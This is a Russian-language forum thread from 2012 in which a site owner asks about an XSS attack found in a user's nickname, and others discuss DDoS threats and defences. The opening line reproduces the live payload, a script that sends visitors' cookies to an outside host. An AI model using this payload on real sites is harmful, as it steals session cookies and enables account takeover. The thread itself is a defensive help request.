это попытка взлома или что?<script>img = new Image();img.src="http://antiha.h19.ru/s.gif?"+document.cookie;</script>
XSS-атака на сайт, кому знакомо ?
ЕСТЬ РЕШЕНИЕ
ЗАКРЫТО
#1
15 августа 2012 в 23:43
в нике юзера вижу такое
#2
16 августа 2012 в 00:04
lezginka.ru, конечно попытка взлома!!! А возможно спама и заражения сайта или пользователей!
#3
16 августа 2012 в 00:44
вот что мне написал этот чел:
уважаемый "властелин" ты свое личико тут покажи, если такой смелый, пусть народ знает своих "героев"
видать это чел и тут на форуме тусуется.Ой xxs атака, что на форуме разнылся, я и 2 сайт хлопну, могу их под ддос положить на вечно, сиди тихо я тут властелин,
уважаемый "властелин" ты свое личико тут покажи, если такой смелый, пусть народ знает своих "героев"
Сегодня в 05:46
Группе, к которой вы принадлежите, запрещено просматривать этот скрытый текст
Очень надеюсь, всё же, что 1.9.1, и тем более 2.0 будут без этого.
#5
16 августа 2012 в 01:46
вот интересно посмотреть что там выдал этот сканер?Проверил Acunetix Web Vulnerability Scanner 8, волосы дыбом встали
кстати. этот чел мне обещал ддос на завтра.
у кого какие есть предложения по защите ?
он сам стесняется тут писать, хотя эти строки и читает(сейчас хакеры стеснительные пошли)
у кого какие есть предложения по защите ?
он сам стесняется тут писать, хотя эти строки и читает(сейчас хакеры стеснительные пошли)
#7
16 августа 2012 в 02:04
На рутрекере есть, если не найдете, могу в личку скинуть.вот интересно посмотреть что там выдал этот сканер?
Да что там интересного то… много пожеланий по поводу закрытия от sql иньекций, и не только.
Мне кажется, не стоит по этому поводу напрягаться, мало, кто может сделать это профессионально.А обычный Hoic4 ////это смешно)кстати. этот чел мне обещал ддос на завтра.
#8
16 августа 2012 в 02:49
iptables для этого нужно использовать, не думаю что ваш сайт понадобился какой то серьезной комманде а один человек маловероятно что сможет серьезную атаку организоватьу кого какие есть предложения по защите ?
#9
16 августа 2012 в 02:56
А еси через Тор работает, тогда Iptables поможет?
Было так /admin/.htaccess с паролем
и соответственно .htpasswd
Вот так...
Пока не удалил, в админку не попал…
Пока не удалил, в админку не попал…
#11
16 августа 2012 в 04:16
Решение — пользователя блокировать — сделать приглашение по инвайтам — в случае входа пользователя по приглашению с плохими намерениями — сразу удалять его.
Хостинг — сделать — фильтрацию по IP адресам, так же и админку на самом сайте. И все файлы важные — права 644.
Ну мне по крайней мере пока помогает — проблем со спамерами и взломщиками пока нет. Раньше были такие попытки, в том числе и взлома.
Хотя конечно ломануть могут что угодно — но только профи и командой — по крайней мере начинающие хакеры мозг тра… ть не будут.
Хостинг — сделать — фильтрацию по IP адресам, так же и админку на самом сайте. И все файлы важные — права 644.
Ну мне по крайней мере пока помогает — проблем со спамерами и взломщиками пока нет. Раньше были такие попытки, в том числе и взлома.
Хотя конечно ломануть могут что угодно — но только профи и командой — по крайней мере начинающие хакеры мозг тра… ть не будут.
#12
16 августа 2012 в 04:25
Hunter (Роман), без обид, но… не решение.
#13
16 августа 2012 в 04:32
Всё, замяли.Акима более не тронут.
Hunter (Роман), без обид, но… не решение.
Да это понятно — я и не обижаюсь — вообще не спец по защите если что.
А я вообще не понимаю смысл этих взломов — для чего это нужно — да еще так в открытую — ну ладно бы какой-то код встроить по тихой чтоб незаметно было — а так смысл какой.
Всегда ж есть Бэкап — можно все на день, два откатить — через хостинг....
Я понимаю банки ломают, ну или крутые сайты конкурентов пытаются устранить. А так смысл. в чем…
по разному бывает...
Хотя, я признаюсь честно, ни какого решения я не увидел, за исключением одного, о котором писать не буду)
Хотя, я признаюсь честно, ни какого решения я не увидел, за исключением одного, о котором писать не буду)